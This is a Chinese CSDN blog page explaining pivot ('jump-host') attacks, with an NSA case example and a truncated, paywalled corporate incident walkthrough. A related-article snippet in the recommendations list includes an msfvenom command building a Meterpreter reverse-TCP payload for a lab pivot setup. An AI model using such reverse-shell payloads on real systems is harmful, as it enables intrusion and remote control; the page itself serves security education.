黑客的隐藏术之跳板攻击

最新推荐文章于 2024-04-22 23:18:19 发布
最新推荐文章于 2024-04-22 23:18:19 发布
阅读量231 收藏
点赞数
文章标签: 网络 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Candour_0/article/details/129339855
版权

黑客的隐藏术之跳板攻击

今天我们为大家介绍下什么是跳板攻击。

跳板攻击是黑客入侵目标网络的一种常用手段。黑客在实施攻击时,通常不会直接从自己的系统向目标发动攻击,而是先攻破若干中间系统,使之成为“跳板机”,再通过这些跳板机完成攻击行动,这个过程就是跳板攻击。

(注:本文中的跳板机与运维人员常用的跳板机不同,其指已经被黑客控制,且可以访问内网进行横向攻击的肉鸡)

图片

黑客实施跳板攻击的原因主要有两个:一方面是跳板攻击的匿名性比较高,且跳板机越多,溯源难度就越高;另一方面是跳板机所在的位置可能比黑客计算机所在的位置更有利,方便其深入专用网络进行后续攻击。

例如在针对西北工业大学的网络攻击中,美国NSA下属TAO攻击了中国周边国家的大批服务器,并控制了大量跳板机,随后精心挑选了其中的49台跳板机和5台代理服务器进行窃密行动,这些跳板机主要分布在日本、韩国、瑞典、波兰、乌克兰等17个国家,其中70%位于中国周边国家,如日本、韩国等。

图片

(图源于《关于西北工业大学发现美国NSA网络攻击调查报告》)

与上述流程类似,下面绒绒以火绒工程师帮助某企业解决的一次实际攻击为例,为大家介绍下跳板攻击的流程。

图片

(以火绒帮助某企业解决的一次实际攻击为例)

图片

0****1

确认目标

黑客利用扫描工具等手段收集目标敏感信息

最低0.47元/天 解锁文章
网络安全大菠萝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
网络攻击分类及原理工具详解.docx
04-17
攻击的纵向实施过程来看,又有获取初级权限攻击、提升最高权限的攻击、后门攻击跳板攻击等;从攻击的类型来看,包括对各种操作系统的攻击、对网络设备的攻击、对特定应用系统的攻击等。 实际上黑客实施一次入侵...
简述网络代理跳板的功能。
Ray
12-03 1796
当从本地入侵其它主机时,本地IP会暴露给对方。通过将某一台主机设置为代理,通过该主机再入侵其它主机,这样就会留下代理跳板的IP地址而有效地保护自己的安全。 ...
网络安全:堡垒机、跳板机、Virtual Private Network知识介绍
IT技术分享社区
04-06 4998
堡垒机是一种网络安全控制节点,主要用于隔离安全较高的内部网络(企业内网)和安全程度较低的外部网络之间的访问。
内网三级跳板
最新发布
Ms08067安全实验室
04-22 626
点击星标,即时接收最新推文本文选自《内网安全攻防:红队之路》扫描二维码五折购书隐藏通信隧道技的根本目的有两个:一是为了使攻击流量能够顺利进出内网,通过使用隧道、代理等技伪装攻击流量的方法,避免内网网络安全设备对攻击流量的检测和查杀。二是为了避免攻击者被追踪溯源,通过采取多级跳板来增加攻击者至内网的主机链,使得即使网络攻击行为被发现,攻击者的真实身份也很难被发现。三级跳板三级跳板顾名...
黑客如何进行跳板攻击与防御详解
≯≯★技术专栏欢迎你!★★≮≮
09-21 2338
黑客如何进行跳板攻击与防御详解黑客在进行攻击时会借用其他系统来达到自己的目的,如对下一目标的攻击和被侵占计算机本身的利用等等。本文介绍了常见的黑客对被侵占计算机的使用方式和安全管理员相应的应对方法。  黑客进行网络攻击时,除了自己手中直接操作的计算机外,往往在攻击进行时和完成之后利用、控制其他的计算机。他们或者是借此达到攻击的目的,或者是把这些计算机派做其他的用途。本文汇总描述了黑客各种利用其
Oracle查询用户所有表、外键
weixin_33747129的博客
08-13 678
select * from all_tab_comments -- 查询所有用户的表,视图等 select * from user_tab_comments -- 查询本用户的表,视图等 select * from all_col_comments --查询所有用户的表的列名和注释. select * from user_col_comm...
网络安全攻击.pptx
06-09
第5章 网络入侵 社会工程学攻击、物理攻击、暴力攻击 Unicode漏洞攻击 缓冲区溢出漏洞进行攻击 第6章 网络后门与网络隐身 通过后门入侵系统 设置代理跳板和清除系统日志 第7章 恶意代码分析与防治 恶意代码的发展史...
局域网隐藏IP地址的方法知识.pdf
02-05
局域网隐藏IP地址的方法知识 ...在实际应用中,隐藏IP地址可以用于保护计算机的安全,防止黑客攻击和扫描。同时,隐藏IP地址也可以用于隐私保护,例如在网上论坛、留言本、计数器、WEB聊天室等场景下隐藏自己的IP地址。
华为挑战赛民间攻击案例
05-09
4. **攻击路径**:展示攻击者如何通过网络跳板隐藏通道等手段,保持匿名性和隐蔽性。 5. **防御策略**:分析现有防御体系的不足,提出可以改进的地方,以及如何有效防止或减缓类似攻击的建议。 6. **教训与启示*...
网络跳板工具SKSERVER
10-22
避免通过代理跳板主机找到真实黑客。本软件可以设置很多层跳板
论网络攻击与网络安全(全文).docx
06-10
1、常用的XX络攻击 目前,XX络攻击方法层出不穷,而且随着技的不断进展,XX络攻击日益呈现自动化、低门槛的趋势,黑客、间谍常采纳的XX络攻击。 1.1 有机可乘的系统漏洞 系统漏洞是指应用软件或操作系统...
这个是关于Windows入侵后的痕迹清理 的相关操作,具体请看资源描述
10-12
为避免入侵行为被发现,攻击者总是会通过各种方式来隐藏自己,比如:隐藏自己的真实IP、清除系统日志、删除上传的工具、隐藏后门文件、擦除入侵过程中所产生的痕迹等。 设置跳板 网络入侵的背后将会诞生一场永不落...
网络安全论文.doc
06-10
比如说,如果攻击者 入侵了一个站点,将它作为一个对其他系统进行攻击的平台或者是跳板,他就会想在适 当的时候登录到这个站点取回他以前存放在系统里面的工具进行新的攻击。很容易想到 的方法就是在这个已经被入侵...
网络安全论文(1).doc
06-10
比如说,如果攻击者 入侵了一个站点,将它作为一个对其他系统进行攻击的平台或者是跳板,他就会想在适 当的时候登录到这个站点取回他以前存放在系统里面的工具进行新的攻击。很容易想到 的方法就是在这个已经被入侵...
漏洞利用exploit ——跳板 静待春暖花开之时,你我相见 听你说一声 好久不见
sxr__nc的博客
03-05 2082
expolit指的是漏洞利用的过程,一般一一段代码的形式出现。exploit的核心功能是淹没函数的返回地址,获取进程的控制权限 关于shellcode前边已经做过相关的介绍,那么shellcode和exploit二者之间有什么联系呢?其实二者在本质上是没有任何联系的但是二者又息息相关,我们知道exploit的核心功能就是提权(getshell),而shellcode就是我们在提权之后要执行的命令,...
内网攻击跳板机为Windows
kiihuang的博客
04-12 106
攻击机kali 192.168.114.62 仅可和 192.168.114.63 通信 中间机 192.168.114.63 和 10.10.10.128 windows 2016 server 内网机 10.10.10.129 10.10.10.130 Linux和windos kali生成对应的shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.114.62 LPORT=4444 -f exe > /tmp/s
内网攻击跳板机为Linux
kiihuang的博客
04-12 208
攻击机 Kali 192.168.114.62 跳板机 Linux 192.168.114.84 10.10.10.200 TYPE=Ethernet PROXY_METHOD=none BROWSER_ONLY=no BOOTPROTO=static DEFROUTE=yes IPV4_FAILURE_FATAL=no IPV6INIT=yes IPV6_AUTOCONF=yes IPV6_DEFROUTE=yes IPV6_FAILURE_FATAL=no IPV6_ADDR_GEN_MODE=s
Web黑客攻击流程与攻击策略
05-29
Web黑客攻击流程通常包括以下几个步骤: 1. 收集信息:黑客通过搜索引擎、目录扫描、端口扫描等方式,收集目标网站的信息,包括IP地址、域名、操作系统、Web应用程序、中间件、数据库等信息。 2. 发现漏洞:黑客...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值